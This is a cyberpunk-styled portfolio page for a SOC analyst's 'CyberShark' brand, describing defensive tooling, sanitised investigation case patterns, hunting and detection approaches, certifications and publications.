CYBERSHARK / SOC IDENTITY / CYBER OCEAN

CyberShark code. secure. dominate.

Georgi Sharkov builds SOC tooling, cyber research, and sharp web experiences under a single brand: CyberShark. The identity is built on sharp predator lines, electric blue highlights, red-alert pressure, and a security-first mindset.

Open GitHub Scan Projects

Brand: CyberShark
Role: SOC Hunter
Signal: Red Alert

PROJECT FEED

Featured drops from the shark tank

01 / CORE

CyberShark Platform

The main CyberShark presence, built as a command deck for projects, analyst support, publications, and digital identity.

Brand anchor

02 / LAB

Experiments

A place for prototypes, AI work, web experiments, and code that came straight out of the neon abyss.

R&D stream

03 / SIGNAL

Working Tool: ATCOR

ATCOR / ATTCOR-CR is my active SOC-focused project, built to help analysts move from alert context to writeups, hunting queries, and handoff-ready outputs.

Open workflow preview

LIVE SIGNAL

Built in code. Driven by purpose. Feared by threats.

This page is designed to feel like a cyberpunk sonar sweep rather than a normal portfolio hero, shaped around Georgi Sharkov's GitHub presence, active SOC tooling, and a drive to make technical work feel sharp and memorable.

SHARK PROFILE

We don't follow paths. We breach them.

Georgi Sharkov uses this space as a neon front door for projects, experiments, SOC tools like ATCOR, and ongoing web builds. It is meant to feel direct, memorable, and a little dangerous, like a signal cutting through dark water.

GitHub Pages Frontend Builds SOC Tooling Cyberpunk Identity Creative Coding

SOC EXPERIENCE

Operational security work shaped by investigation discipline

My security focus sits at the intersection of SOC operations, digital forensics, threat hunting, and customer-facing reporting. I approach alerts as investigation problems first: validate the signal, identify the evidence that matters most, build the case narrative, and turn the outcome into clear next steps for both technical and non-technical audiences.

CASE STUDIES

Sanitised investigation patterns and outcomes

01 / POWERSHELL

Suspicious execution triage

Reviewed script execution alerts by validating user context, command-line intent, host exposure, and follow-on process activity before deciding between escalation, closure, or tuning.

Validation to disposition

02 / DOWNLOAD

Internet download investigations

Built browser-download case flow around file reputation, user confirmation, delivery path, execution evidence, and customer-safe remediation guidance for high-noise alerts.

User action to risk decision

03 / USB

Removable media review

Used host telemetry, removable-device evidence, file execution records, and timeline reasoning to assess whether USB activity represented normal business use or a case requiring escalation.

Device history and context

SOC SUPPORT

Built to help SOC analysts move faster

Write-up Support

Customer-ready incident communication shaped for speed, clarity, and technical accuracy. This area covers investigation summaries, executive-safe customer updates, false-positive closures, confirmed-incident write-ups, containment recommendations, and reusable response wording for common alert types.

Includes triage summary templates, customer-safe update formats, internal-to-customer translation examples, and remediation wording that can be reused across repeated investigation outcomes.

Triage Workflow

A practical analyst path from alert intake to final disposition. This section is built around alert validation, evidence review, escalation triggers, severity decisions, and repeatable playbooks that keep investigations consistent across similar detections.

Focus areas include IOC prioritisation, decision logic, case disposition flow, and workflow patterns for PowerShell, browser downloads, USB activity, persistence, and PUP-related alerts.

Tooling and Automation

A working area for analyst efficiency: helper tools, hunting query packs, parser ideas, workflow accelerators, and small automation that reduce manual effort while improving investigation quality.

This is where ATCOR capability highlights, IOC extraction helpers, evidence quality checks, enrichment ideas, and cross-platform query generation can continue to grow into real operational tools.

DETECTION AND HUNTING

Turning repeat alert patterns into repeatable logic

I focus on converting investigation experience into reusable hunting and detection value: shaping queries that answer the real case question, identifying where detections need tuning, and building practical logic that supports analysts rather than overwhelming them with noise.

Detection Thinking

Build around behaviour, supporting evidence, and analyst workflow so alerts are easier to validate and explain.

Hunting Queries

Develop cross-platform hunting logic for endpoint activity, user behaviour, downloads, persistence, and suspicious execution chains.

Tuning Mindset

Reduce repeated false positives by identifying stable benign patterns without weakening meaningful detection coverage.

SKILLS AND STACK

Core capabilities and platforms

Core Skills

Threat Hunting DFIR Incident Response Alert Triage IOC Analysis Customer Reporting Case Narrative Building Detection Tuning

Tool Stack

Microsoft Sentinel Defender XDR Splunk Elastic CrowdStrike Carbon Black Darktrace ATCOR

CERTIFICATIONS AND TRAINING

Formal learning backed by practical analyst work

FOR508: Advanced Incident Response, Threat Hunting, and Digital Forensics

Advanced DFIR training focused on incident response methodology, threat hunting discipline, forensic reasoning, host artefacts, and practical investigation tradecraft under real-world pressure.

Continuous Analyst Development

Ongoing development across SOC workflows, detection logic, reporting quality, security tooling, and investigative decision making, with a focus on improving both analyst speed and output quality.

PUBLICATION SIGNAL

Selected publications and featured expert coverage

Kroll Conversations: Meet the SOC Experts

Georgi Sharkov is featured as the first Kroll Cyber Academy alum to move into the SOC, contributing to real-time threat triage, escalation, client-focused reporting, and continuous tool and workflow improvement.

Read publication

Securing Smart Home Environment Using Edge Computing

IEEE International Smart Cities Conference (ISC2), September 26, 2022. A publication focused on improving smart home security through edge computing approaches.

View IEEE publication

Achievement: FOR508 Coin

Earned after successful completion of FOR508: Advanced Incident Response, Threat Hunting, and Digital Forensics. This coin marks hands-on DFIR achievement and reflects the ability to apply incident response, threat hunting, and forensic techniques against rapidly evolving threats.

View the official SANS FOR508 coin See SANS Lethal Forensicator coin holders